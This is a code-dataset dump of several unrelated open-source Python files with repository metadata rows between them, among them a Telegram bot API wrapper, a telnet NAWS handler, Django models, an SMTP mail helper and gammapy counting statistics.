if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if reply_markup is not None:
payload['reply_markup'] = reply_markup
if explanation_entities:
payload['explanation_entities'] = explanation_entities
if protect_content:
payload['protect_content'] = protect_content
return self.client.callApi ("sendPoll", payload )
def stopPoll(self , chat_id, message_id, reply_markup=None):
payload = {'chat_id': str(chat_id), 'message_id': message_id}
if reply_markup:
payload['reply_markup'] = reply_markup
return self.client.callApi ("stopPoll", payload )
def answerCallbackQuery(self , callback_query_id, text=None, show_alert=None, url=None, cache_time=None):
payload = {'callback_query_id': callback_query_id}
if text:
payload['text'] = text
if show_alert is not None:
payload['show_alert'] = show_alert
if url:
payload['url'] = url
if cache_time is not None:
payload['cache_time'] = cache_time
return self.client.callApi ("answerCallbackQuery", payload )
def answerInlineQuery(self , inline_query_id, results, cache_time=None, is_personal=None, next_offset=None, switch_pm_text=None, switch_pm_parameter=None):
payload = {'inline_query_id': inline_query_id, 'results': results }
if cache_time is not None:
payload['cache_time'] = cache_time
if is_personal is not None:
payload['is_personal'] = is_personal
if next_offset is not None:
payload['next_offset'] = next_offset
if switch_pm_text:
payload['switch_pm_text'] = switch_pm_text
if switch_pm_parameter:
payload['switch_pm_parameter'] = switch_pm_parameter
return self.client.callApi ("answerInlineQuery", payload )
| 15,952 | -6 | 885 |
e148ccaa2017c9088365c178882f6f4d7c85c4bb | 1,886 | py | Python | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 5 | 2015-01-30T08:47:59.000Z | 2022-01-22T19:27:03.000Z | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 2 | 2017-12-28T21:36:48.000Z | 2017-12-28T21:36:57.000Z | src/server/portal/naws.py | Kelketek/evennia | cc56a7155f4fb975a6fc9e811bd6eadf3d710243 | [
"BSD-3-Clause"
] | 1 | 2020-02-21T05:30:58.000Z | 2020-02-21T05:30:58.000Z | """
NAWS - Negotiate About Window Size
This implements the NAWS telnet option as per
https://www.ietf.org/rfc/rfc1073.txt
NAWS allows telnet clients to report their
current window size to the client and update
it when the size changes
"""
from django.conf import settings
from src.utils import utils
NAWS = chr(31)
IS = chr(0)
# default taken from telnet specification
DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
DEFAULT_HEIGHT = settings.CLIENT_DEFAULT_HEIGHT
# try to get the customized mssp info, if it exists.
class Naws(object):
"""
Implements the MSSP protocol. Add this to a
variable on the telnet protocol to set it up.
"""
def __init__(self, protocol):
"""
initialize NAWS by storing protocol on ourselves
and calling the client to see if it supports
NAWS.
"""
self.naws_step = 0
self.protocol = protocol
self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH} # windowID (0 is root):width
self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT} # windowID:width
self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)
def no_naws(self, option):
"""
This is the normal operation.
"""
self.protocol.handshake_done()
def do_naws(self, option):
"""
Negotiate all the information.
"""
self.protocol.handshake_done()
| 30.419355 | 101 | 0.661188 | """
NAWS - Negotiate About Window Size
This implements the NAWS telnet option as per
https://www.ietf.org/rfc/rfc1073.txt
NAWS allows telnet clients to report their
current window size to the client and update
it when the size changes
"""
from django.conf import settings
from src.utils import utils
NAWS = chr(31)
IS = chr(0)
# default taken from telnet specification
DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
DEFAULT_HEIGHT = settings.CLIENT_DEFAULT_HEIGHT
# try to get the customized mssp info, if it exists.
class Naws(object):
"""
Implements the MSSP protocol. Add this to a
variable on the telnet protocol to set it up.
"""
def __init__(self, protocol):
"""
initialize NAWS by storing protocol on ourselves
and calling the client to see if it supports
NAWS.
"""
self.naws_step = 0
self.protocol = protocol
self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH} # windowID (0 is root):width
self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT} # windowID:width
self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)
def no_naws(self, option):
"""
This is the normal operation.
"""
self.protocol.handshake_done()
def do_naws(self, option):
"""
Negotiate all the information.
"""
self.protocol.handshake_done()
def negotiate_sizes(self, options):
if len(options) == 4:
# NAWS is negotiated with 16bit words
width = options[0] + options[1]
self.protocol.protocol_flags['SCREENWIDTH'][0] = int(width.encode('hex'), 16)
height = options[2] + options[3]
self.protocol.protocol_flags['SCREENHEIGHT'][0] = int(height.encode('hex'), 16)
| 360 | 0 | 27 |
7da257725a70d5f7a7926bb43365cc244654dc62 | 4,026 | py | Python | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | apps/dramas/models.py | ChenCrazy/MacOnline | b954ce85c8d14ef65eb54b365b2573da792b2d2f | [
"MIT"
] | null | null | null | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from datetime import datetime
# from DjangoUeditor.models import UEditorField
from django.db import models
from organization.models import DramaOrg, Author
| 37.981132 | 115 | 0.696225 | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from datetime import datetime
# from DjangoUeditor.models import UEditorField
from django.db import models
from organization.models import DramaOrg, Author
class Drama(models.Model):
drama_org = models.ForeignKey(DramaOrg, verbose_name=u"团队组织", null=True, blank=True)
name = models.CharField(max_length=50, verbose_name=u"番剧名")
desc = models.CharField(max_length=300, verbose_name=u"番剧描述")
detail = models.TextField(verbose_name=u"番剧详情")
# detail = UEditorField(verbose_name=u"番剧详情",width=600, height=300, imagePath="dramas/ueditor/",
# filePath="dramas/ueditor/", default='')
is_banner = models.BooleanField(default=False, verbose_name=u"是否轮播")
# author = models.ForeignKey(Author, verbose_name=u"讲师", null=True, blank=True)
degree = models.CharField(verbose_name=u"级别", choices=(("cj", "初级"), ("zj", "中级"), ("gj", "高级")), max_length=2)
watch_times = models.IntegerField(default=0, verbose_name=u"欣赏时长(分钟数)")
appreciator = models.IntegerField(default=0, verbose_name=u'观看人数')
fav_nums = models.IntegerField(default=0, verbose_name=u'收藏人数')
image = models.ImageField(upload_to="dramas/%Y/%m", verbose_name=u"封面图", max_length=100)
click_nums = models.IntegerField(default=0, verbose_name=u"点击量")
# category = models.CharField(default=u"后端开发", max_length=20, verbose_name=u"类别")
# tag = models.CharField(default="", verbose_name=u"标签", max_length=10)
# youneed_know = models.CharField(default="", max_length=300, verbose_name=u"须知")
# author_tell = models.CharField(default="", max_length=300, verbose_name=u"作者有话说")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"番剧"
verbose_name_plural = verbose_name
def get_jj_nums(self):
# 获取视频集数
return self.serial_set.all().count()
get_jj_nums.short_description = "剧集数"
def go_to(self):
from django.utils.safestring import mark_safe
return mark_safe("<a href='http://www.projectsedu.com'>跳转</>")
go_to.short_description = "跳转"
def get_watch_users(self):
return self.userdrama_set.all()[:5]
def get_drama_serial(self):
# 获取番剧所有剧集
return self.serial_set.all()
def __unicode__(self):
return self.name
class BannerDrama(Drama):
class Meta:
verbose_name = "轮播"
verbose_name_plural = verbose_name
proxy = True
class Serial(models.Model):
drama = models.ForeignKey(Drama, verbose_name=u"番剧")
name = models.CharField(max_length=100, verbose_name=u"剧集名")
watch_times = models.IntegerField(default=0, verbose_name=u"欣赏时长(分钟数)")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"剧集"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_serial_video(self):
# 获取视频剧集
return self.video_set.all()
class Video(models.Model):
serial = models.ForeignKey(Serial, verbose_name=u"剧集")
name = models.CharField(max_length=100, verbose_name=u"番剧名")
watch_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟数)")
url = models.CharField(max_length=200, default="", verbose_name=u"访问地址")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"视频"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class DramaResource(models.Model):
drama = models.ForeignKey(Drama, verbose_name=u"番剧")
name = models.CharField(max_length=100, verbose_name=u"名称")
download = models.FileField(upload_to="dramas/resource/%Y/%m", verbose_name=u"资源文件", max_length=100)
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"资源"
verbose_name_plural = verbose_name
| 475 | 3,524 | 115 |
befa272aee7e1f6568b6b56d01d63869929c48e0 | 1,199 | py | Python | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | Year1Term1/IntroductionToProgramming/bookcheckout.py | linzexinmasterchief/University-Courseworks | e07b4b117941837108b0922dc0d5e32303cf66a3 | [
"Unlicense"
] | null | null | null | """
This file handles the checkout of books, with log entry added
"""
import database as db
# member_id is a 4-digit numebr and checkout_list is a list containing the full detail of the book being checked out
def go(checkout_list = [], member_id = "0"):
"""
This function takes in a list of books and a member id,
then modify the database.txt file so that these books are borrowed
by this member
"""
# since only the available books can be add to the checkout_list, there is no need to check again
for target_book in checkout_list:
result = db.modify_member_id(target_book[0], member_id)
# check if this checkout is succeed
if result == 0:
# add log entry
# target_book[0] is book id
db.checkout_log(target_book[0])
# stop checkout process and report back (highly unlikely)
return result
return 0
# test code
if __name__ == "__main__":
# go([
# [['32_0', '"La crise europeene et la premiere guerre mondiale"', 'Pierre Renouvin.', '1/5/2015', '0'],
# ['21_0', '"Institutions of economic growth"', 'J.P.Powelson', '30/3/2015', '0'],
# ])
pass | 36.333333 | 116 | 0.633028 | """
This file handles the checkout of books, with log entry added
"""
import database as db
# member_id is a 4-digit numebr and checkout_list is a list containing the full detail of the book being checked out
def go(checkout_list = [], member_id = "0"):
"""
This function takes in a list of books and a member id,
then modify the database.txt file so that these books are borrowed
by this member
"""
# since only the available books can be add to the checkout_list, there is no need to check again
for target_book in checkout_list:
result = db.modify_member_id(target_book[0], member_id)
# check if this checkout is succeed
if result == 0:
# add log entry
# target_book[0] is book id
db.checkout_log(target_book[0])
# stop checkout process and report back (highly unlikely)
return result
return 0
# test code
if __name__ == "__main__":
# go([
# [['32_0', '"La crise europeene et la premiere guerre mondiale"', 'Pierre Renouvin.', '1/5/2015', '0'],
# ['21_0', '"Institutions of economic growth"', 'J.P.Powelson', '30/3/2015', '0'],
# ])
pass | 0 | 0 | 0 |
1b6923ea2847cbbc0437e08a871182116547d68d | 554 | py | Python | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | modules/dbnd/src/targets/__init__.py | ipattarapong/dbnd | 7bd65621c46c73e078eb628f994127ad4c7dbd1a | [
"Apache-2.0"
] | null | null | null | import os
from targets.base_target import Target
from targets.data_target import DataTarget
from targets.dir_target import DirTarget
from targets.errors import (
FileAlreadyExists,
FileSystemException,
MissingParentDirectory,
NotADirectory,
)
from targets.file_target import FileSystemTarget, FileTarget
from targets.fs.file_system import FileSystem
from targets.fs.local import LocalFileSystem
from targets.inmemory_target import InMemoryTarget
from targets.target_factory import target
from targets.utils.atomic import AtomicLocalFile
| 30.777778 | 60 | 0.84657 | import os
from targets.base_target import Target
from targets.data_target import DataTarget
from targets.dir_target import DirTarget
from targets.errors import (
FileAlreadyExists,
FileSystemException,
MissingParentDirectory,
NotADirectory,
)
from targets.file_target import FileSystemTarget, FileTarget
from targets.fs.file_system import FileSystem
from targets.fs.local import LocalFileSystem
from targets.inmemory_target import InMemoryTarget
from targets.target_factory import target
from targets.utils.atomic import AtomicLocalFile
| 0 | 0 | 0 |
1035dcef4699f204f8ec305de84ef466c3c4f6fe | 9,168 | py | Python | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | 1 | 2017-11-22T17:07:56.000Z | 2017-11-22T17:07:56.000Z | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | null | null | null | gammapy/stats/counts_statistic.py | Rishank2610/gammapy | 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | [
"BSD-3-Clause"
] | 1 | 2019-09-04T14:03:33.000Z | 2019-09-04T14:03:33.000Z | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import abc
import numpy as np
from scipy.stats import chi2
from gammapy.utils.roots import find_roots
from .fit_statistics import cash, wstat
__all__ = ["WStatCountsStatistic", "CashCountsStatistic"]
class CashCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with known background.
Parameters
----------
n_on : int
Measured counts
mu_bkg : float
Known level of background
"""
@property
def n_bkg(self):
"""Expected background counts"""
return self.mu_bkg
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. 0 expected signal counts"""
return cash(self.n_on, self.mu_bkg + 0)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - mu_bkg"""
return cash(self.n_on, self.n_on)
class WStatCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with unknown background.
Parameters
----------
n_on : int
Measured counts in on region
n_off : int
Measured counts in off region
alpha : float
Acceptance ratio of on and off measurements
mu_sig : float
Expected signal counts in on region
"""
@property
def n_bkg(self):
"""Known background computed alpha * n_off"""
return self.alpha * self.n_off
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg - self.mu_sig
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on + self.alpha ** 2 * self.n_off)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. mu_sig expected signal counts"""
return wstat(self.n_on, self.n_off, self.alpha, self.mu_sig)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - alpha * n_off - mu_sig"""
return wstat(self.n_on, self.n_off, self.alpha, self.n_sig + self.mu_sig)
| 32.28169 | 106 | 0.584751 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import abc
import numpy as np
from scipy.stats import chi2
from gammapy.utils.roots import find_roots
from .fit_statistics import cash, wstat
__all__ = ["WStatCountsStatistic", "CashCountsStatistic"]
class CountsStatistic(abc.ABC):
@property
def ts(self):
"""Return stat difference (TS) of measured excess versus no excess."""
# Remove (small) negative TS due to error in root finding
ts = np.clip(self.stat_null - self.stat_max, 0, None)
return ts
@property
def sqrt_ts(self):
"""Return statistical significance of measured excess.
The sign of the excess is applied to distinguish positive and negative fluctuations.
"""
return np.sign(self.n_sig) * np.sqrt(self.ts)
@property
def p_value(self):
"""Return p_value of measured excess.
Here the value accounts only for the positive excess significance (i.e. one-sided).
"""
return 0.5 * chi2.sf(self.ts, 1)
def compute_errn(self, n_sigma=1.0):
"""Compute downward excess uncertainties.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum.
Parameters
----------
n_sigma : float
Confidence level of the uncertainty expressed in number of sigma. Default is 1.
"""
errn = np.zeros_like(self.n_on, dtype="float")
min_range = self.n_sig - 2 * n_sigma * (self.error + 1)
it = np.nditer(errn, flags=["multi_index"])
while not it.finished:
roots, res = find_roots(
self._stat_fcn,
min_range[it.multi_index],
self.n_sig[it.multi_index],
nbin=1,
args=(self.stat_max[it.multi_index] + n_sigma ** 2, it.multi_index),
)
if np.isnan(roots[0]):
errn[it.multi_index] = -self.n_on[it.multi_index]
else:
errn[it.multi_index] = roots[0] - self.n_sig[it.multi_index]
it.iternext()
return errn
def compute_errp(self, n_sigma=1):
"""Compute upward excess uncertainties.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum.
Parameters
----------
n_sigma : float
Confidence level of the uncertainty expressed in number of sigma. Default is 1.
"""
errp = np.zeros_like(self.n_on, dtype="float")
max_range = self.n_sig + 2 * n_sigma * (self.error + 1)
it = np.nditer(errp, flags=["multi_index"])
while not it.finished:
roots, res = find_roots(
self._stat_fcn,
self.n_sig[it.multi_index],
max_range[it.multi_index],
nbin=1,
args=(self.stat_max[it.multi_index] + n_sigma ** 2, it.multi_index),
)
errp[it.multi_index] = roots[0]
it.iternext()
return errp - self.n_sig
def compute_upper_limit(self, n_sigma=3):
"""Compute upper limit on the signal.
Searches the signal value for which the test statistics is n_sigma**2 away from the maximum
or from 0 if the measured excess is negative.
Parameters
----------
n_sigma : float
Confidence level of the upper limit expressed in number of sigma. Default is 3.
"""
ul = np.zeros_like(self.n_on, dtype="float")
min_range = self.n_sig
max_range = self.n_sig + 2 * n_sigma * (self.error + 1)
it = np.nditer(ul, flags=["multi_index"])
while not it.finished:
ts_ref = self._stat_fcn(min_range[it.multi_index], 0.0, it.multi_index)
roots, res = find_roots(
self._stat_fcn,
min_range[it.multi_index],
max_range[it.multi_index],
nbin=1,
args=(ts_ref + n_sigma ** 2, it.multi_index),
)
ul[it.multi_index] = roots[0]
it.iternext()
return ul
def n_sig_matching_significance(self, significance):
"""Compute excess matching a given significance.
This function is the inverse of `significance`.
Parameters
----------
significance : float
Significance
Returns
-------
n_sig : `numpy.ndarray`
Excess
"""
n_sig = np.zeros_like(self.n_bkg, dtype="float")
it = np.nditer(n_sig, flags=["multi_index"])
while not it.finished:
lower_bound = np.sqrt(self.n_bkg[it.multi_index]) * significance
# find upper bounds for secant method as in scipy
eps = 1e-4
upper_bound = lower_bound * (1 + eps)
upper_bound += eps if upper_bound >= 0 else -eps
roots, res = find_roots(
self._n_sig_matching_significance_fcn,
lower_bound=lower_bound,
upper_bound=upper_bound,
args=(significance, it.multi_index),
nbin=1,
method="secant",
)
n_sig[it.multi_index] = roots[0] # return NaN if fail
it.iternext()
return n_sig
class CashCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with known background.
Parameters
----------
n_on : int
Measured counts
mu_bkg : float
Known level of background
"""
def __init__(self, n_on, mu_bkg):
self.n_on = np.asanyarray(n_on)
self.mu_bkg = np.asanyarray(mu_bkg)
@property
def n_bkg(self):
"""Expected background counts"""
return self.mu_bkg
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. 0 expected signal counts"""
return cash(self.n_on, self.mu_bkg + 0)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - mu_bkg"""
return cash(self.n_on, self.n_on)
def _stat_fcn(self, mu, delta=0, index=None):
return cash(self.n_on[index], self.mu_bkg[index] + mu) - delta
def _n_sig_matching_significance_fcn(self, n_sig, significance, index):
TS0 = cash(n_sig + self.mu_bkg[index], self.mu_bkg[index])
TS1 = cash(n_sig + self.mu_bkg[index], self.mu_bkg[index] + n_sig)
return np.sign(n_sig) * np.sqrt(np.clip(TS0 - TS1, 0, None)) - significance
class WStatCountsStatistic(CountsStatistic):
"""Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable
with unknown background.
Parameters
----------
n_on : int
Measured counts in on region
n_off : int
Measured counts in off region
alpha : float
Acceptance ratio of on and off measurements
mu_sig : float
Expected signal counts in on region
"""
def __init__(self, n_on, n_off, alpha, mu_sig=None):
self.n_on = np.asanyarray(n_on)
self.n_off = np.asanyarray(n_off)
self.alpha = np.asanyarray(alpha)
if mu_sig is None:
self.mu_sig = np.zeros_like(self.n_on)
else:
self.mu_sig = np.asanyarray(mu_sig)
@property
def n_bkg(self):
"""Known background computed alpha * n_off"""
return self.alpha * self.n_off
@property
def n_sig(self):
"""Excess"""
return self.n_on - self.n_bkg - self.mu_sig
@property
def error(self):
"""Approximate error from the covariance matrix."""
return np.sqrt(self.n_on + self.alpha ** 2 * self.n_off)
@property
def stat_null(self):
"""Stat value for null hypothesis, i.e. mu_sig expected signal counts"""
return wstat(self.n_on, self.n_off, self.alpha, self.mu_sig)
@property
def stat_max(self):
"""Stat value for best fit hypothesis, i.e. expected signal mu = n_on - alpha * n_off - mu_sig"""
return wstat(self.n_on, self.n_off, self.alpha, self.n_sig + self.mu_sig)
def _stat_fcn(self, mu, delta=0, index=None):
return (
wstat(
self.n_on[index],
self.n_off[index],
self.alpha[index],
(mu + self.mu_sig[index]),
)
- delta
)
def _n_sig_matching_significance_fcn(self, n_sig, significance, index):
stat0 = wstat(
n_sig + self.n_bkg[index], self.n_off[index], self.alpha[index], 0
)
stat1 = wstat(
n_sig + self.n_bkg[index],
self.n_off[index],
self.alpha[index],
n_sig,
)
return np.sign(n_sig) * np.sqrt(np.clip(stat0 - stat1, 0, None)) - significance
| 1,416 | 5,049 | 185 |
86aeeee5627ee8b07a01f9042f2d7316ad96cdd1 | 7,123 | py | Python | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | 1 | 2017-01-17T06:52:17.000Z | 2017-01-17T06:52:17.000Z | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | null | null | null | _common/C_mail.py | FNNDSC/cruntesting | d3580a8494f3b3da100669262ec99d9eceb32327 | [
"MIT"
] | null | null | null | # NAME
#
# C_mail
#
# DESCRIPTION
#
# 'C_mail' is a simple class for handling/abstracting common
# email related activities.
#
# Once setup with address lists, and/or subject text
# it sends body text and inline attachments.
#
# HISTORY
#
# 11 January 2007
# o Initial development implementation.
#
# System imports
import os
import os.path
import sys
import string
import datetime
import smtplib
from cgi import *
from email.MIMEImage import MIMEImage
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# 3rd party imports
#from configobj import ConfigObj
# SCIN imports
#from _common.systemMisc import *
#import systemMisc
| 25.99635 | 69 | 0.628527 | # NAME
#
# C_mail
#
# DESCRIPTION
#
# 'C_mail' is a simple class for handling/abstracting common
# email related activities.
#
# Once setup with address lists, and/or subject text
# it sends body text and inline attachments.
#
# HISTORY
#
# 11 January 2007
# o Initial development implementation.
#
# System imports
import os
import os.path
import sys
import string
import datetime
import smtplib
from cgi import *
from email.MIMEImage import MIMEImage
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# 3rd party imports
#from configobj import ConfigObj
# SCIN imports
#from _common.systemMisc import *
#import systemMisc
class C_mail :
#
# Member variables
#
# - Core variables - generic
mstr_obj = 'C_mail'; # name of object class
mstr_name = 'void'; # name of object variable
mstr_def = 'void'; # name of function being processed
m_id = -1; # id of agent
m_iter = 0; # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0; # debug related value for
# object
m_warnings = 0; # show warnings
# (and warnings level)
#
# - Class variables
# Core variables - specific
#
mlstr_to = [] # recipient list
mstr_from = "" # from string
mstr_subject = "" # subject string
mstr_body = "" # body text
mlstr_attach = [] # list of files to attach
mstr_SMTPserver = "localhost"
def to_set(self, alstr_to):
self.mlstr_to = alstr_to
def from_set(self, astr_from):
self.mstr_from = astr_from
def subject_set(self, astr_subject):
self.mstr_subject = astr_subject
def body_set(self, astr_body):
self.mstr_body = astr_body
def attach_set(self, alstr_attach):
self.mlstr_attach = alstr_attach
def SMTPserver_set(self, astr_STMPserver):
self.mstr_SMTPserver
#
# Methods
#
# Core methods - construct, initialise, id
def error_exit( self,
astr_action,
astr_error,
aexitCode):
print "%s:: FATAL ERROR" % self.mstr_obj
print "\tSorry, some error seems to have occurred in <%s::%s>" \
% (self.mstr_obj, self.mstr_def)
print "\tWhile %s" % astr_action
print "\t%s" % astr_error
print ""
print "Returning to system with error code %d" % aexitCode
sys.exit(aexitCode)
def core_construct( self,
astr_obj = 'C_mail',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
def reconstruct(self, alstr_to = "",
astr_from = "",
astr_subject = "",
astr_body = "",
alstr_attach = ""
):
mlstr_to = alstr_to
mstr_from = astr_from
mstr_subject = astr_subject
mstr_body = astr_body
mlstr_attach = alstr_attach
def __init__(self, **header):
#
# PRECONDITIONS
# o None - all arguments are optional
#
# POSTCONDITIONS
# o Any arguments specified in the **header are
# used to initialize internal variables.
#
self.core_construct()
# Initialize to class definition variables
lstr_to = self.mlstr_to
str_from = self.mstr_from
str_subject = self.mstr_subject
str_body = self.mstr_body
lstr_attach = self.mlstr_attach
# Now override any that are spec'd in the **header
for field in header.keys():
if field == 'to': lstr_to = header[field]
if field == 'from': str_from = header[field]
if field == 'subject': str_subject = header[field]
if field == 'body': str_body = header[field]
if field == 'attach': lstr_attach = header[field]
self.reconstruct( lstr_to,
str_from,
str_subject,
str_body,
lstr_attach)
def __str__(self):
print 'mstr_obj\t\t= %s' % self.mstr_obj
print 'mstr_name\t\t= %s' % self.mstr_name
print 'm_id\t\t\t= %d' % self.m_id
print 'm_iter\t\t\t= %d' % self.m_iter
print 'm_verbosity\t\t= %d' % self.m_verbosity
print 'm_warnings\t\t= %d' % self.m_warnings
return 'This class implements simple functionality.'
def internals_check(self):
#
# POSTCONDITIONS
# o If mstr_SMTPserver is zero length (i.e. not set), script
# will terminate
#
if not len(self.mstr_SMTPserver):
self.error_exit('running ::internals_check()',
'it seems that the SMTP server has not been set.',
1)
def send(self):
#
# PRECONDITIONS
# o Internal components should be defined. At the very least
# this include:
#
# - mstr_body
# - mlstr_to
#
# POSTCONDITIONS
# o Thin dispatching layer to smtp_process()
# o Is used to present a uniform API
#
#self.debug_trace("Entering C_mail::send()")
self.smtp_process( self.mlstr_to,
self.mstr_from,
self.mstr_subject,
self.mstr_body,
self.mlstr_attach)
#self.debug_trace("Leaving C_mail::send()")
def send(self, **header):
#
# PRECONDITIONS
# **header:
#
# 'from', 'subject', 'body' : strings
# 'to', 'attach' : list of strings
#
#
# POSTCONDITIONS
# For each non-zero length input argument in
# 'header', temporarily ignore any internals and
# send a message using these overrides.
#
#self.debug_trace("Entering C_mail::send()")
lstr_to = self.mlstr_to
str_from = self.mstr_from
str_subject = self.mstr_subject
str_body = self.mstr_body
lstr_attach = self.mlstr_attach
for field in header.keys():
if field == 'to': lstr_to = header[field]
if field == 'sender': str_from = header[field]
if field == 'subject': str_subject = header[field]
if field == 'body': str_body = header[field]
if field == 'attach': lstr_attach = header[field]
self.smtp_process( lstr_to, str_from, str_subject,
str_body, lstr_attach)
#self.debug_trace("Leaving C_mail::send()")
def smtp_process(self, alstr_to,
astr_from,
astr_subject,
astr_body,
alstr_attach):
#
# PRECONDITIONS
# o Should only be called by one of the send() methods
# o Assumes that any attachments are valid files
#
# POSTCONDITIONS
# o Interacts with the SMTPlib module
#
self.internals_check()
msg = MIMEMultipart()
msg['Subject'] = astr_subject
msg['From'] = astr_from
msg.preamble = "This is a mult-part message in MIME format."
msg.attach(MIMEText(astr_body))
msg.epilogue = ''
for file in alstr_attach:
fp = open(file, 'rb')
img = MIMEImage(fp.read())
img.add_header('Content-ID', file)
fp.close()
msg.attach(img)
smtp = smtplib.SMTP()
smtp.connect(self.mstr_SMTPserver)
for str_to in alstr_to:
msg['To'] = str_to
smtp.sendmail(astr_from, str_to, msg.as_string())
smtp.close()
| 5,119 | 1,274 | 23 |
ad24952040f37c4dee236ba5635c947ea8283462 | 3,018 | py | Python | doc/sphinxext/gen_commands.py | stlukyanenko/mne-python | 508cfbc13bc2e068efb3bf8b7999b83047851729 | [
"BSD-3-Clause"
] | 2 | 2020-06-15T12:25:12.000Z | 2020-09-13T11:49:51.000Z | doc/sphinxext/gen_commands.py | Moonshadowzb/mne-python | 89647f3363fcb5de306cc18e55e7b9fa89fe0315 | [
"BSD-3-Clause"
] | null | null | null | doc/sphinxext/gen_commands.py | Moonshadowzb/mne-python | 89647f3363fcb5de306cc18e55e7b9fa89fe0315 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import glob
from importlib import import_module
import os
from os import path as op
from mne.utils import _replace_md5, ArgvSetter
# Header markings go:
# 1. =/= : Page title
# 2. = : Command name
# 3. -/- : Command description
# 4. - : Command sections (Examples, Notes)
header = """\
:orphan:
.. _python_commands:
===============================
Command line tools using Python
===============================
.. contents:: Page contents
:local:
:depth: 1
"""
command_rst = """
.. _{0}:
{0}
{1}
.. rst-class:: callout
{2}
"""
# This is useful for testing/iterating to see what the result looks like
if __name__ == '__main__':
generate_commands_rst()
| 26.946429 | 75 | 0.549702 | # -*- coding: utf-8 -*-
import glob
from importlib import import_module
import os
from os import path as op
from mne.utils import _replace_md5, ArgvSetter
def setup(app):
app.connect('builder-inited', generate_commands_rst)
def setup_module():
# HACK: Stop nosetests running setup() above
pass
# Header markings go:
# 1. =/= : Page title
